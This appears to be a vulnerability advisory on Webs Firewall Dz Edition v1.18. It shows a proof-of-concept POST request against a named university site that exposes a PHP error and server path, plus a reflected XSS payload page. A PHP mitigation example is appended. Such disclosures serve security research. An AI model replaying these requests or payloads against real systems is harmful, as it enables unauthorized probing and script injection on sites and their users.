Webs Firewall Dz Edition v1.18 Multi vulnerability

2018.03.08
indoushka (DZ)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

====================================================================================================================================
| # Title     : Webs Firewall Dz Edition v1.18 Multi vulnerability                                                                |
| # Telegram  : @indoushka                                                                                                         |
| # Tested on : windows 10 Français V.(Pro)                                                                                        |
| # Version   : 1.18                                                                                                               |
| # Vendor    : http://www.ithrytec.com/                                                                                           |
====================================================================================================================================

poc :

[+] Dorking in Google or other search engine

Application error message :

Request

POST /webs/index HTTP/1.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Referer: http://imaa-univ.com/webs/
Cookie: PHPSESSID=42b374f6e8a331cad18647dd127167b0
Host: imaa-univ.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

signin=&password=g00dPa%24%24w0rD&username[]=nxseqxea

Response

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 06 Mar 2018 17:49:59 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Original-Content-Encoding: gzip
Content-Length: 2661

Vulnerability description :

This page contains an error/warning message that may disclose sensitive information. The message can also contain the location of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages.

This vulnerability affects /webs/index.

Attack details :

URL encoded POST input username was set to nxseqxea

Error message found :

<b>Warning</b>: mysqli_real_escape_string() expects parameter 2 to be string, array given in <b>/home/imaauniv/public_html/webs/index.php</b> on line <b>106</b><br />

XSS Reflected - jQuery JavaScript Library v2.2.4 :

<html>
<head>
  <meta charset="utf-8">
  <title>XSS Reflected - jQuery JavaScript Library v2.2.4 </title>
  <script src="http://imaa-univ.com/webs/assets/js/jquery-2.2.4.min.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>
<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected"><script><marquee><font color=lime size=32>indoushka</font></marquee>;</script>;</script></option>
      </select>
    </p>
  </form>
</body>
</html>

Greetings to :
=======================================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh |
=======================================================================================================================================
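A mitigation sketch for the error-message disclosure at /webs/index reported above, added here as an example and not taken from Webs Firewall's code: the warning appears because `username[]=` arrives in PHP as an array, so the handler should accept only string fields and keep PHP errors out of the response. The names `scalar_field`, `handle_login` and `$lookup`, the length limits, and the sample account are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: return a form field only if it is a plain string.
// PHP turns "username[]=x" into an array, which is what triggered the
// mysqli_real_escape_string() warning quoted in the advisory.
function scalar_field(array $form, string $name, int $maxLen = 128): ?string
{
    $value = $form[$name] ?? null;
    if (!is_string($value) || $value === '' || strlen($value) > $maxLen) {
        return null;
    }
    return $value;
}

// Hypothetical login entry point. $lookup stands in for the database call
// (for instance a mysqli prepared statement) so the example runs offline.
function handle_login(array $form, callable $lookup): array
{
    $username = scalar_field($form, 'username');
    $password = scalar_field($form, 'password', 1024);
    if ($username === null || $password === null) {
        // One generic answer for every malformed request: no PHP warning,
        // no file path and no line number reach the client.
        return [400, 'Invalid request.'];
    }
    return $lookup($username, $password) ? [200, 'OK'] : [401, 'Login failed.'];
}

// Production settings: log errors server-side, never render them to clients.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Constructed sample inputs: the advisory's request body and a well-formed one.
parse_str('signin=&password=g00dPa%24%24w0rD&username[]=nxseqxea', $malformed);
parse_str('signin=&password=g00dPa%24%24w0rD&username=alice', $normal);

// Constructed stand-in for the credential check (assumed account "alice").
$lookup = fn(string $u, string $p): bool =>
    $u === 'alice' && hash_equals('g00dPa$$w0rD', $p);

foreach ([$malformed, $normal] as $form) {
    [$status, $body] = handle_login($form, $lookup);
    echo $status, ' ', $body, PHP_EOL;
}
```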

